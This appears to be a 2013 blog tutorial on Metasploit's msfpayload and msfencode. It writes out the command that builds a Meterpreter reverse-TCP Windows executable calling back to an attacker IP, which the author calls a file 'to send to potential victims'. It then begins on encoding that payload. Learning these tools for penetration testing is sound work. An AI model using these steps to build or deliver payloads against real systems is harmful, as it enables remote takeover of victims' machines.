a bookworm who loves cyber security. a sucker for hacker and security conferences. loves attending and promoting conferences and has spoken at multiple conferences globally (almost). interests include cyber threat intelligence, cyber 'warfare', cyber 'terrorism' and cyber conflict.
Tuesday, 4 June 2013
MSFPAYLOAD & MSFENCODE
"msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module." - http://www.offensive-security.com
Open the terminal and type in #msfpayload -l to see all the available payloads in the MSF framework.
To view the information of a specific payload, do a #msfpayload windows/meterpreter/reverse_tcp O
To create a payload (which will result and executable for us to send to potential victims), do
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.71.128 LPORT=443 R > /root/Desktop/Safekeep/reverse_tcp.exe
-) msfpayload (the tool)
-) windows/meterpreter/reverse_tcp (the payload)
-) LHOST=192.168.71.128 (the attacker machine IP, where you want the victim to connect to)
"msfencode is another great little tool in the framework's arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target."- http://www.offensive-security.com
Open the terminal and type in #msfencode -h to see the options.
To see all the possible encode methods, type #msfencode -l
Now lets encode the payload that we generated just now using msfpayload.